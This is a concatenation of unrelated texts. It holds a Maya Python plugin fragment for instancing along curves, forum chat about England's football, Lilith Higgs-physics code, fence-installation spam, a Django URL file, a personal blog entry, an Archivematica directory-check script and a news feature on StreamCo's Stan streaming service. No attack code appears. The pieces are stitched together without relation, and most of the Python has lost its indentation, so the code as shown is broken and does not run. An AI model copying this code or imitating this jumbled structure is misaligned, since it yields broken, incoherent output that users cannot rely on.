node.attributeAffects( node.distOffsetAttr, node.outputTranslationAttr.compound )
rampAttributeAffects(node.positionRampAttr, node.outputTranslationAttr.compound)
# Rotation affects
node.attributeAffects( node.inputCurveAttr, node.outputRotationAttr.compound )
node.attributeAffects( node.instanceCountAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.instanceLengthAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.instancingModeAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.maxInstancesByLengthAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.orientationModeAttr, node.outputRotationAttr.compound)
node.attributeAffects( node.distOffsetAttr, node.outputRotationAttr.compound )
node.attributeAffects( node.inputOrientationAxisAttr.compound, node.outputRotationAttr.compound)
rampAttributeAffects(node.rotationRampAttr, node.outputRotationAttr.compound)
# Scale affects
node.attributeAffects( node.inputCurveAttr, node.outputScaleAttr.compound )
node.attributeAffects( node.instanceCountAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.instanceLengthAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.instancingModeAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.maxInstancesByLengthAttr, node.outputScaleAttr.compound)
node.attributeAffects( node.distOffsetAttr, node.outputScaleAttr.compound )
rampAttributeAffects(node.scaleRampAttr, node.outputScaleAttr.compound)
def initializePlugin( mobject ):
mplugin = OpenMayaMPx.MFnPlugin( mobject )
try:
# Register command
mplugin.registerCommand( kPluginCmdName, instanceAlongCurveCommand.cmdCreator )
if OpenMaya.MGlobal.mayaState() != OpenMaya.MGlobal.kBatch:
mplugin.addMenuItem("Instance Along Curve", "MayaWindow|mainEditMenu", kPluginCmdName, "")
# Register AE template
pm.callbacks(addCallback=loadAETemplateCallback, hook='AETemplateCustomContent', owner=kPluginNodeName)
# Register node
mplugin.registerNode( kPluginNodeName, kPluginNodeId, instanceAlongCurveLocator.nodeCreator,
instanceAlongCurveLocator.nodeInitializer, OpenMayaMPx.MPxNode.kLocatorNode, kPluginNodeClassify )
except:
sys.stderr.write('Failed to register plugin instanceAlongCurve. stack trace: \n')
sys.stderr.write(traceback.format_exc())
raise
def uninitializePlugin( mobject ):
mplugin = OpenMayaMPx.MFnPlugin( mobject )
try:
mplugin.deregisterCommand( kPluginCmdName )
mplugin.deregisterNode( kPluginNodeId )
except:
        sys.stderr.write('Failed to deregister plugin instanceAlongCurve\n')
raise
###############
# AE TEMPLATE #
###############
def loadAETemplateCallback(nodeName):
AEinstanceAlongCurveLocatorTemplate(nodeName)
class AEinstanceAlongCurveLocatorTemplate(pm.ui.AETemplate):
def addControl(self, control, label=None, **kwargs):
pm.ui.AETemplate.addControl(self, control, label=label, **kwargs)
def beginLayout(self, name, collapse=True):
pm.ui.AETemplate.beginLayout(self, name, collapse=collapse)
def __init__(self, nodeName):
pm.ui.AETemplate.__init__(self,nodeName)
self.thisNode = None
self.node = pm.PyNode(self.nodeName)
if self.node.type() == kPluginNodeName:
self.beginScrollLayout()
self.beginLayout("Instance Along Curve Settings", collapse=0)
self.addControl("instancingMode", label="Instancing Mode", changeCommand=self.onInstanceModeChanged)
self.addControl("instanceCount", label="Count", changeCommand=self.onInstanceModeChanged)
self.addControl("instanceLength", label="Distance", changeCommand=self.onInstanceModeChanged)
self.addControl("maxInstancesByLength", label="Max Instances", changeCommand=self.onInstanceModeChanged)
self.addControl("distOffset", label="Initial Position Offset", changeCommand=lambda nodeName: self.updateDimming(nodeName, "distOffset"))
self.addSeparator()
self.addControl("orientationMode", label="Orientation Mode", changeCommand=lambda nodeName: self.updateDimming(nodeName, "orientationMode"))
self.addControl("inputOrientationAxis", label="Orientation Axis", changeCommand=lambda nodeName: self.updateDimming(nodeName, "inputOrientationAxis"))
self.addSeparator()
self.addControl("instanceDisplayType", label="Instance Display Type", changeCommand=lambda nodeName: self.updateDimming(nodeName, "instanceDisplayType"))
self.addControl("instanceBoundingBox", label="Use bounding box", changeCommand=lambda nodeName: self.updateDimming(nodeName, "instanceBoundingBox"))
self.addSeparator()
self.addControl("inputTransform", label="Input object", changeCommand=lambda nodeName: self.updateDimming(nodeName, "inputTransform"))
self.addControl("inputShadingGroup", label="Shading Group", changeCommand=lambda nodeName: self.updateDimming(nodeName, "inputShadingGroup"))
def showRampControls(rampName):
self.beginLayout(rampName.capitalize() + " Control", collapse=True)
mel.eval('AEaddRampControl("' + nodeName + "." + rampName + 'Ramp"); ')
self.addControl(rampName + "RampOffset", label= rampName.capitalize() + " Ramp Offset")
self.addControl(rampName + "RampAmplitude", label= rampName.capitalize() + " Ramp Amplitude")
self.addControl(rampName + "RampRandomAmplitude", label= rampName.capitalize() + " Ramp Random")
self.addControl(rampName + "RampAxis", label= rampName.capitalize() + " Ramp Axis")
self.endLayout()
showRampControls("position")
showRampControls("rotation")
showRampControls("scale")
self.addExtraControls()
self.endLayout()
self.endScrollLayout()
def onRampUpdate(self, attr):
pm.gradientControl(attr)
def updateDimming(self, nodeName, attr):
if pm.PyNode(nodeName).type() == kPluginNodeName:
node = pm.PyNode(nodeName)
instanced = node.isInstanced()
hasInputTransform = node.inputTransform.isConnected()
hasInputCurve = node.inputCurve.isConnected()
self.dimControl(nodeName, attr, instanced or (not hasInputCurve) or (not hasInputTransform))
def onInstanceModeChanged(self, nodeName):
self.updateDimming(nodeName, "instancingMode")
if pm.PyNode(nodeName).type() == kPluginNodeName:
nodeAttr = pm.PyNode(nodeName + ".instancingMode")
mode = nodeAttr.get("instancingMode")
# If dimmed, do not update dimming
if mode == 0:
self.dimControl(nodeName, "instanceLength", True)
self.dimControl(nodeName, "maxInstancesByLength", True)
self.updateDimming(nodeName, "instanceCount")
else:
self.updateDimming(nodeName, "instanceLength")
self.updateDimming(nodeName, "maxInstancesByLength")
self.dimControl(nodeName, "instanceCount", True)
# Command
class instanceAlongCurveCommand(OpenMayaMPx.MPxCommand):
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
self.mUndo = []
def isUndoable(self):
return True
def undoIt(self):
OpenMaya.MGlobal.displayInfo( "Undo: instanceAlongCurveCommand\n" )
# Reversed for undo :)
for m in reversed(self.mUndo):
m.undoIt()
def redoIt(self):
OpenMaya.MGlobal.displayInfo( "Redo: instanceAlongCurveCommand\n" )
for m in self.mUndo:
m.doIt()
def hasShapeBelow(self, dagPath):
sutil = OpenMaya.MScriptUtil()
uintptr = sutil.asUintPtr()
sutil.setUint(uintptr , 0)
dagPath.numberOfShapesDirectlyBelow(uintptr)
return sutil.getUint(uintptr) > 0
def findShadingGroup(self, dagPath):
# Search in children first before extending to shape
for child in xrange(dagPath.childCount()):
childDagPath = OpenMaya.MDagPath()
fnDagNode = OpenMaya.MFnDagNode(dagPath.child(child))
fnDagNode.getPath(childDagPath)
fnSet = self.findShadingGroup(childDagPath)
if fnSet is not None:
return fnSet
if self.hasShapeBelow(dagPath):
dagPath.extendToShape()
fnDepNode = OpenMaya.MFnDependencyNode(dagPath.node())
instPlugArray = fnDepNode.findPlug("instObjGroups")
instPlugArrayElem = instPlugArray.elementByLogicalIndex(dagPath.instanceNumber())
if instPlugArrayElem.isConnected():
connectedPlugs = OpenMaya.MPlugArray()
instPlugArrayElem.connectedTo(connectedPlugs, False, True)
if connectedPlugs.length() == 1:
sgNode = connectedPlugs[0].node()
if sgNode.hasFn(OpenMaya.MFn.kSet):
return OpenMaya.MFnSet(sgNode)
return None
def doIt(self,argList):
try:
list = OpenMaya.MSelectionList()
OpenMaya.MGlobal.getActiveSelectionList(list)
if list.length() == 2:
curveDagPath = OpenMaya.MDagPath()
list.getDagPath(0, curveDagPath)
curveDagPath.extendToShape()
shapeDagPath = OpenMaya.MDagPath()
list.getDagPath(1, shapeDagPath)
if(curveDagPath.node().hasFn(OpenMaya.MFn.kNurbsCurve)):
# We need the curve transform
curvePlug = OpenMaya.MFnDagNode(curveDagPath).findPlug("worldSpace", False).elementByLogicalIndex(0)
# We need the shape's transform too
transformFn = OpenMaya.MFnDagNode(shapeDagPath.transform())
transformMessagePlug = transformFn.findPlug("message", True)
shadingGroupFn = self.findShadingGroup(shapeDagPath)
# Create node first
mdagModifier = OpenMaya.MDagModifier()
self.mUndo.append(mdagModifier)
newNode = mdagModifier.createNode(kPluginNodeId)
mdagModifier.doIt()
# Assign new correct name and select new locator
newNodeFn = OpenMaya.MFnDagNode(newNode)
newNodeFn.setName("instanceAlongCurveLocator#")
newNodeTransformName = newNodeFn.name()
# Get the node shape
nodeShapeDagPath = OpenMaya.MDagPath()
newNodeFn.getPath(nodeShapeDagPath)
nodeShapeDagPath.extendToShape()
newNodeFn = OpenMaya.MFnDagNode(nodeShapeDagPath)
def setupRamp(rampAttr):
# Set default ramp values
defaultPositions = OpenMaya.MFloatArray(1, 0.0)
defaultValues = OpenMaya.MFloatArray(1, 1.0)
defaultInterpolations = OpenMaya.MIntArray(1, 3)
plug = newNodeFn.findPlug(rampAttr.ramp)
ramp = OpenMaya.MRampAttribute(plug)
ramp.addEntries(defaultPositions, defaultValues, defaultInterpolations)
setupRamp(instanceAlongCurveLocator.positionRampAttr)
setupRamp(instanceAlongCurveLocator.rotationRampAttr)
setupRamp(instanceAlongCurveLocator.scaleRampAttr)
# Select new node shape
OpenMaya.MGlobal.clearSelectionList()
msel = OpenMaya.MSelectionList()
msel.add(nodeShapeDagPath)
OpenMaya.MGlobal.setActiveSelectionList(msel)
# Connect :D
mdgModifier = OpenMaya.MDGModifier()
self.mUndo.append(mdgModifier)
mdgModifier.connect(curvePlug, newNodeFn.findPlug(instanceAlongCurveLocator.inputCurveAttr))
mdgModifier.connect(transformMessagePlug, newNodeFn.findPlug(instanceAlongCurveLocator.inputTransformAttr))
if shadingGroupFn is not None:
shadingGroupMessagePlug = shadingGroupFn.findPlug("message", True)
mdgModifier.connect(shadingGroupMessagePlug, newNodeFn.findPlug(instanceAlongCurveLocator.inputShadingGroupAttr))
mdgModifier.doIt()
# (pymel) create a locator and make it the parent
locator = pm.createNode('locator', ss=True, p=newNodeTransformName)
# Show AE because instancing logic depends on update...
mel.eval("openAEWindow")
# Enable drawing overrides
instanceCountPlug = newNodeFn.findPlug("instanceCount", False)
instanceCountPlug.setInt(10)
else:
sys.stderr.write("Please select a curve first")
else:
sys.stderr.write("Please select a curve and a shape")
except:
sys.stderr.write('Failed trying to create locator. stack trace: \n')
sys.stderr.write(traceback.format_exc())
@staticmethod
def cmdCreator():
return OpenMayaMPx.asMPxPtr( instanceAlongCurveCommand() ) |
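# ---------------------------------------------------------------------------
# Usage sketch (hypothetical, not part of the plugin). Assuming this file is
# saved on Maya's plug-in path and kPluginCmdName resolves to
# 'instanceAlongCurve', the command could be driven like this from the
# script editor (Maya 2016-era Python 2):
#
#   import maya.cmds as cmds
#   cmds.loadPlugin('instanceAlongCurve.py')
#   cmds.select(['curve1', 'pCube1'], replace=True)  # curve first, then shape
#   cmds.instanceAlongCurve()
# ---------------------------------------------------------------------------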
England failed to qualify for Euro 2008 after losing a sensational game against Croatia at Wembley.
Why do we waste valuable airtime on these pathetic no-marks? Time to embrace a vastly superior sport as our national game.
Why isn't Rugby Union our national sport?
Was Jen born on the day the Origin of Species was released to the trade while Darwin shivered and swore in Ilkley?
I'd say it was feted.
Please to pass on b'day congrats.
She was indeed. And, if there's anything in that reincarnation nonsense (which there isn't, by the way), she might well have inherited the spirit of JFK.
I shall pass on your congrats. |
##########################################################################
#
# This file is part of Lilith
# made by J. Bernon and B. Dumont
#
# Web page: http://lpsc.in2p3.fr/projects-th/lilith/
#
# In case of questions email bernon@lpsc.in2p3.fr dum33@ibs.re.kr
#
#
# Lilith is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Lilith is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Lilith. If not, see <http://www.gnu.org/licenses/>.
#
##########################################################################
import os
import numpy as np
from math import sqrt, log
from cmath import sqrt as csqrt
from cmath import asin as casin
from cmath import log as clog
from scipy.interpolate import UnivariateSpline
from param import *
wdir = '/'.join(os.path.realpath(__file__).split("/")[:-1])+'/Grids/'
#### read VBF -> h cross section grid @ LO and interpolation ####
def VBF_ff(spline_deg=3):
VBF_LO_file = open(wdir+'VBF_LO_grid.dat',"r")
VBF_LO_grid = {"WW": [], "ZZ": [], "WZ": []}
hmassVBF = []
for line in VBF_LO_file:
line = line.strip("\n").split()
hmassVBF.append(float(line[0]))
VBF_LO_grid["WW"].append(float(line[1]))
VBF_LO_grid["ZZ"].append(float(line[2]))
VBF_LO_grid["WZ"].append(float(line[3])-float(line[1])-float(line[2]))
CVBFW_LO = UnivariateSpline(hmassVBF, VBF_LO_grid["WW"], k=spline_deg, s=0)
CVBFZ_LO = UnivariateSpline(hmassVBF, VBF_LO_grid["ZZ"], k=spline_deg, s=0)
CVBFWZ_LO = UnivariateSpline(hmassVBF, VBF_LO_grid["WZ"], k=spline_deg, s=0)
VBF_LO_file.close()
VBF_LO = {"CVBFW_LO": CVBFW_LO, "CVBFZ_LO": CVBFZ_LO, "CVBFWZ_LO": CVBFWZ_LO}
return VBF_LO
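# The functions below are the standard one-loop form factors entering the
# h -> gg, h -> gamma gamma and h -> Z gamma amplitudes: fhiggs/ghiggs are
# the usual scalar loop functions f(tau) and g(tau), A12/A1 the spin-1/2 and
# spin-1 amplitudes, and the A12A* variants their pseudoscalar counterparts.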
def fhiggs(t):
if t<=1.:
return casin(sqrt(t))**2.
else:
return -(log((sqrt(t) + sqrt(t-1.))/(sqrt(t) - sqrt(t-1.))) - pi*1j )**2./4.
def ghiggs(t):
if t<=1:
return csqrt(1-1/t)/2. * ( clog((1 + csqrt(1-1/t))/(1 - csqrt(1-1/t)))-pi*1j)
else:
return csqrt(1/t-1)*casin(csqrt(t))
def I1(tau,l):
return (tau*l/(2.*(tau-l)) + tau**2*l**2 /(2.*(tau-l)**2)*(fhiggs(1/tau)-fhiggs(1/l)) +
tau**2 * l /(tau-l)**2 * (ghiggs(1/tau)-ghiggs(1/l)))
def I2(tau,l):
return -tau*l/(2.*(tau-l))*(fhiggs(1/tau)-fhiggs(1/l))
def A12(tau):
return 2./tau *(1.+(1.-1./tau) * fhiggs(tau))
def A1(tau):
return -(3.*tau+2.*tau**2. +3.*(2.*tau-1.) * fhiggs(tau))/tau**2
def A12Zgamma(tau,l):
return I1(tau,l)-I2(tau,l)
def A1Zgamma(tau,l):
return cW*(4.*(3.-sW2/cW2)*I2(tau,l)+((1.+2./tau)*sW2/cW2-(5.+2./tau))*I1(tau,l))
def A12A(tau):
return 2/tau*fhiggs(tau)
def computeformfactors():
FF = {}
FF["A12t"] = lambda mh: A12((mh/(2.*mt))**2)
FF["A12c"] = lambda mh: A12((mh/(2.*mc))**2)
FF["A12b"] = lambda mh: A12((mh/(2.*mb))**2)
FF["A12tau"] = lambda mh: A12((mh/(2.*mtau))**2)
FF["A1W"] = lambda mh: A1((mh/(2.*mW))**2)
FF["A12At"] = lambda mh: A12A((mh/(2.*mt))**2)
FF["A12Ac"] = lambda mh: A12A((mh/(2.*mc))**2)
FF["A12Ab"] = lambda mh: A12A((mh/(2.*mb))**2)
FF["A12Atau"] = lambda mh: A12A((mh/(2.*mtau))**2)
FF["A12Zt"] = lambda mh: A12Zgamma(4*(mt/(mh*1.))**2, 4*(mt/(mZ*1.))**2)
FF["A12Zc"] = lambda mh: A12Zgamma(4*(mc/(mh*1.))**2, 4*(mc/(mZ*1.))**2)
FF["A12Zb"] = lambda mh: A12Zgamma(4*(mb/(mh*1.))**2, 4*(mb/(mZ*1.))**2)
FF["A12Ztau"] = lambda mh: A12Zgamma(4*(mtau/(mh*1.))**2, 4*(mtau/(mZ*1.))**2)
FF["A1ZW"] = lambda mh: A1Zgamma(4*(mW/(mh*1.))**2, 4*(mW/(mZ*1.))**2)
FF["A12AZt"] = lambda mh: I2(4*(mt/(mh*1.))**2, 4*(mt/(mZ*1.))**2)
FF["A12AZc"] = lambda mh: I2(4*(mc/(mh*1.))**2, 4*(mc/(mZ*1.))**2)
FF["A12AZb"] = lambda mh: I2(4*(mb/(mh*1.))**2, 4*(mb/(mZ*1.))**2)
FF["A12AZtau"] = lambda mh: I2(4*(mtau/(mh*1.))**2, 4*(mtau/(mZ*1.))**2)
return FF
#### decay: h -> gamma gamma width @ LO & reduced coupling ####
def Htogammagamma(mh, CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF):
return (10**6*Gf*alpha**2/(128.*pi**3*np.sqrt(2))*mh**3 *
abs(3.*(2./3.)**2 *(CT*FF["A12t"] + CC*FF["A12c"]) +
(CB*3.*(1./3.)**2 * FF["A12b"] + CL*FF["A12tau"])+CW*FF["A1W"])**2. +
10**6*Gf*alpha**2/(128.*pi**3*np.sqrt(2))*mh**3 *
abs(3.*(2./3.)**2 *(CTIM*FF["A12At"] + CCIM*FF["A12Ac"]) +
(CBIM*3.*(1./3.)**2 * FF["A12Ab"] + CLIM*FF["A12Atau"]))**2.)
def redCgammagamma(CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF, Cgammagammaadd=0.):
A12t = FF["A12t"]
A12c = FF["A12c"]
A12b = FF["A12b"]
A12tau = FF["A12tau"]
A1W = FF["A1W"]
A12At = FF["A12At"]
A12Ac = FF["A12Ac"]
A12Ab = FF["A12Ab"]
A12Atau = FF["A12Atau"]
return (sqrt( ( (abs(3.*(2./3.)**2 *(CT*A12t + CC*A12c) +
CB*3.*(1./3.)**2 * A12b + CL*A12tau+CW*A1W)**2.) +
(abs(3.*(2./3.)**2 *(CTIM*A12At + CCIM*A12Ac) +
3.*(-1./3.)**2*CBIM*A12Ab + CLIM*A12Atau)**2)) /
(abs(3.*(2./3.)**2 *(A12t + A12c) +
(3.*(1./3.)**2 * A12b + A12tau)+A1W)**2.) )
+ Cgammagammaadd)
#### decay: h -> Z gamma width @ LO & reduced coupling ####
def HtoZgamma(mh, CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF):
return (10**6*Gf**2*mW**2*alpha*mh**3/(64.*pi**4)*(1-mZ**2/mh**2)**3 *
abs( 1/(cW)*3.*2/3.*(CT*(2*1/2. - 4*2/3.*sW2)*FF["A12Zt"] +
CC*(2*1/2. - 4*2/3.*sW2)*FF["A12Zc"]) +
1/(cW)*(3*(-1/3.)*CB*(2*(-1/2.) - 4*(-1/3.)*sW2)*FF["A12Zb"] +
(-1)*CL*(2*(-1/2.) - 4*(-1)*sW2)*FF["A12Ztau"]) +
CW*FF["A1ZW"] )**2 +
10**6*Gf**2*mW**2*alpha*mh**3/(16.*pi**4)*(1-mZ**2/mh**2)**3 *
abs( 1/(cW)*3.*2/3.*(CTIM*(2*1/2. - 4*2/3.*sW2)*FF["A12AZt"] +
CCIM*(2*1/2. - 4*2/3.*sW2)*FF["A12AZc"]) +
1/(cW)*(3*(-1/3.)*CBIM*(2*(-1/2.) - 4*(-1/3.)*sW2)*FF["A12AZb"] +
            (-1)*CLIM*(2*(-1/2.) - 4*(-1)*sW2)*FF["A12AZtau"]) )**2)
def redCZgamma(CT, CB, CC, CL, CW, CTIM, CBIM, CCIM, CLIM, FF, CZgammaadd=0.):
A12Zt = FF["A12Zt"]
A12Zc = FF["A12Zc"]
A12Zb = FF["A12Zb"]
A12Ztau = FF["A12Ztau"]
A1ZW = FF["A1ZW"]
A12AZt = FF["A12AZt"]
A12AZc = FF["A12AZc"]
A12AZb = FF["A12AZb"]
A12AZtau = FF["A12AZtau"]
vt = (2*1/2. - 4*2/3.*sW2)
vc = (2*1/2. - 4*2/3.*sW2)
vb = (2*(-1/2.) - 4*(-1/3.)*sW2)
vl = (2*(-1/2.) - 4*(-1)*sW2)
return (sqrt( (abs( 1/(cW)*(3.*2/3.*(CT*vt*A12Zt + CC*vc*A12Zc) +
(3*(-1/3.)*CB*vb*A12Zb +
(-1)*CL*vl*A12Ztau)) + CW*A1ZW )**2 +
4*abs(1/(cW)*(3.*2/3.*(CTIM*vt*A12AZt + CCIM*vc*A12AZc) +
3*(-1/3.)*CBIM*vb*A12AZb + (-1)*CLIM*vl*A12AZtau))**2)/
(abs(1/(cW)*(3.*2/3.*(vt*A12Zt + vc*A12Zc) +
(3*(-1/3.)*vb*A12Zb + (-1)*vl*A12Ztau)) + A1ZW )**2) )
+ CZgammaadd)
#### decay: h -> g g width @ LO & reduced coupling ####
def Htogg(mh, CT, CB, CC, CTIM, CBIM, CCIM, FF):
return (10**3*Gf*alphas**2*mh**3/(36.*np.sqrt(2)*pi**3) *
abs(0.75*(CT*FF["A12t"] + CB*FF["A12b"] + CC*FF["A12c"]))**2 +
10**3*Gf*alphas**2*mh**3/(36.*np.sqrt(2)*pi**3) *
abs(0.75*(CTIM*FF["A12At"] + CBIM*FF["A12Ab"] + CCIM*FF["A12Ac"]))**2)
def redCgg(CT, CB, CC, CTIM, CBIM, CCIM, FF, Cggadd=0.):
A12t = FF["A12t"]
A12c = FF["A12c"]
A12b = FF["A12b"]
A12At = FF["A12At"]
A12Ac = FF["A12Ac"]
A12Ab = FF["A12Ab"]
return (sqrt( (abs(0.75*(CT*A12t + CB*A12b + CC*A12c))**2 +
abs(0.75*(CTIM*A12At + CBIM*A12Ab + CCIM*A12Ac))**2)/
(abs(0.75*(A12t + A12b + A12c))**2) )
+ Cggadd)
#### production: g g -> h cross section @ LO ####
def ggFh(mh, CT, CB, CC, CTIM, CBIM, CCIM, FF):
return (Gf*alphas_mh**2/(288.*np.sqrt(2)*pi) *
abs(0.75*(CT*FF["A12t"] + CB*FF["A12b"] + CC*FF["A12c"]))**2 +
Gf*alphas_mh**2/(288.*np.sqrt(2)*pi) *
abs(0.75*(CTIM*FF["A12At"] + CBIM*FF["A12Ab"] + CCIM*FF["A12Ac"]))**2)
#### production: VBF -> h cross section @ LO & reduced coupling ####
def redCVBF(CW, CZ, grid_interp):
VBFW_LO = grid_interp["CVBFW_LO"]
VBFZ_LO = grid_interp["CVBFZ_LO"]
VBFWZ_LO = grid_interp["CVBFWZ_LO"]
return sqrt( (CW**2*VBFW_LO + CZ**2*VBFZ_LO + CW*CZ*VBFWZ_LO)/
(VBFW_LO + VBFZ_LO + VBFWZ_LO) )
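# Usage sketch (hypothetical values): the grids returned by VBF_ff() are
# splines in the Higgs mass, so they must be evaluated at mh before being
# handed to redCVBF, e.g.
#
#   grids = VBF_ff()
#   grids_at_mh = dict((k, float(v(125.0))) for k, v in grids.items())
#   CVBF = redCVBF(1.0, 1.0, grids_at_mh)   # SM point: reduced coupling ~ 1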
|
You can trust Fence Installation Guys to deliver the most impressive professional services for Fences in Essex Junction, VT. Our team of well-trained contractors will offer the support you need, using the most innovative techniques around. Our materials are of the best quality, and we know how to keep your costs down. We can help you make decisions for your project, answer your questions, and arrange a meeting with our workers once you give us a call at 800-341-4840.
You have a budget to stick to, and you want to save money. You still need superior service with Fences in Essex Junction, VT, and you can trust our business to save you money while continuing to supply the very best quality results. Our efforts to save you money will never compromise the quality of our work. We use the finest solutions and supplies, so your job will withstand the test of time, and we conserve your funds with strategies that don't affect the excellence of your project. We accomplish this by offering you the best discounts available and by eliminating expensive blunders. If you want to lower your expenses, Fence Installation Guys is the company to contact. You can reach us at 800-341-4840 to start.
If you're considering Fences in Essex Junction, VT, you should be well informed so you can make the best decisions. We make sure you know exactly what to expect. We take the surprises out of the equation by providing accurate and detailed information. You can start by discussing your job with our customer support reps when you call 800-341-4840. We will talk through your questions and concerns when you contact us and get you set up with a scheduled appointment. We consistently arrive at the appointed time, ready to work with you.
If you are organizing a project regarding Fences in Essex Junction, VT, there are lots of reasons to work with Fence Installation Guys. We have the best customer satisfaction ratings, the highest quality resources, and the most helpful and reliable money-saving practices. Our company has the expertise you need to fulfill your goals. Dial 800-341-4840 to reach Fence Installation Guys and discuss your needs regarding Fences in Essex Junction.
"""advogaprojeto URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from core import views
from django.contrib import admin
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^registrar/$', views.registrar, name='registrar'),
url(r'^login/$', views.login, name='login'),
url(r'^logout/$', views.log_out, name='logout'),
url(r'^index/$', views.index, name='index'),
url(r'^gerar_documento$', views.gerar_documento, name='gerar_documento'),
url(r'^cadastro$', views.cadastrar_documento, name='cadastrar_documento'),
url(r'^documento/(?P<id_arquivo>\d+)$', views.documento, name='documento'),
url(r'^delete/(?P<id_template>\d+)$', views.delete_template, name='delete')
]
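# Usage sketch (assumed view names): the named patterns above can be reversed
# in templates, e.g. {% url 'documento' id_arquivo=42 %} -> /documento/42,
# or in code via django.urls.reverse('documento', args=[42]) (Django 1.10+).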
|
I guess I have decided not to buy the car. I'm fairly sure I could get the loan since I started working, but I don't want to add another payment onto our bills each month until I get all of my doctor bills paid off. I don't want to run us low when we don't have to. You know?
Anyway, Spunky has a vet visit today. His stupid allergies are acting up again since spring is on its way. The grass makes his eyes water and he is scratching himself to death. He has no fleas, so I know that can't be it. This happened last year too. He gets a shot and he feels better. One a month until allergy season is gone. The joys of having a pet. But you know, I wouldn't trade him for anything.
Just an update, since I am trying to get back into this whole blogging thing. I don't really remember it being this hard. Hmm.
#!/usr/bin/env python2
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
from __future__ import print_function
import os
import sys
requiredDirectories = ["objects",
                       "logs",
                       "metadata",
                       "metadata/submissionDocumentation"]
allowableFiles = ["processingMCP.xml"]
def checkDirectory(directory, ret=0):
try:
for directory, subDirectories, files in os.walk(directory):
for file in files:
filePath = os.path.join(directory, file)
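                # The joined path is not used further; the walk exists only to
                # surface traversal/permission errors, which are counted below.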
except Exception as inst:
print("Error navigating directory:", directory.__str__(), file=sys.stderr)
print(type(inst), file=sys.stderr)
print(inst.args, file=sys.stderr)
ret += 1
return ret
def verifyDirectoriesExist(SIPDir, ret=0):
for directory in requiredDirectories:
if not os.path.isdir(os.path.join(SIPDir, directory)):
print("Required Directory Does Not Exist: " + directory, file=sys.stderr)
ret += 1
return ret
def verifyNothingElseAtTopLevel(SIPDir, ret=0):
for entry in os.listdir(SIPDir):
if os.path.isdir(os.path.join(SIPDir, entry)):
if entry not in requiredDirectories:
print("Error, directory exists: " + entry, file=sys.stderr)
ret += 1
else:
if entry not in allowableFiles:
print("Error, file exists: " + entry, file=sys.stderr)
ret += 1
return ret
if __name__ == '__main__':
SIPDir = sys.argv[1]
ret = verifyDirectoriesExist(SIPDir)
ret = verifyNothingElseAtTopLevel(SIPDir, ret)
ret = checkDirectory(SIPDir, ret)
if ret != 0:
import time
time.sleep(10)
quit(ret)
|
StreamCo CEO Mike Sneesby will happily shake the Netflix boss’s hand. Image: Alex Heber.
Netflix on Wednesday announced it would officially launch its Australian streaming service in March 2015.
StreamCo, the $100 million joint venture between Fairfax and Channel 9, has also been madly developing its own internet TV service called Stan.
There has been a lot of speculation around when Stan will be launched but the company’s CEO Mike Sneesby said it has deliberately not confirmed timings.
“We haven’t disclosed our launch date, very intentionally,” he told Business Insider. “There’s clearly a bunch of indicators that might indicate when our launch is going to be and that was speculated in relation to Better Call Saul.
“It’s important that we don’t confirm the date mostly because of that competitive situation.
“I think Netflix has given an indication that it’s March but again they haven’t themselves even fixed a date on that. They may launch earlier, they may launch later than that.
“We are indicatively pegged around a date with Better Call Saul coming to Australia but again we’ve got flexibility as well, and we want to have that flexibility.”
Television as a medium and a business is changing rapidly. Only a few years ago there were just a couple of channels and Pay TV ran alongside that. Then digital TV launched and more free-to-air channels were available.
But with technology making content freely available on the internet, consumers are now demanding it be available when and where they want it.
These demands have sparked the internet streaming industry which is led by the likes of Netflix in the US – challenging incumbents in the market.
“This is a revolution and I think the change that’s happened in the last six months has been unbelievable,” StreamCo’s acquisition boss Les Sampson said.
StreamCo picked this trend and started building its own platform. They’ve got a product almost ready to launch into a hot market after being in existence for only just a year. This week Business Insider got to take a look how far the company has already come.
Here's the asbestos-ridden cottage on Channel Nine's Sydney campus where it all started in January this year.
You've got to start somewhere. StreamCo began developing Stan in this run-down cottage on Channel 9's Sydney campus.
Stan CEO Mike Sneesby took Business Insider on a tour of the company's very humble beginnings. To get in, you've got to scoot past the loo.
Every day the team would do a stand-up meeting in this tiny room.
It was freezing in winter. The heating didn't work and the team was making trips to Big W buying oil heaters. They accumulated so many the power kept tripping.
One day one of the tech guys leaned against a window pane and it fell out. There's also asbestos in the building.
There were no fancy kitchens or ping pong tables.
It was generally pretty basic.
But four weeks ago, team Stan relocated into the Channel 9 sales team's old office.
The new digs are much cleaner, brighter and warmer.
And also a little corporate. Stan is growing up.
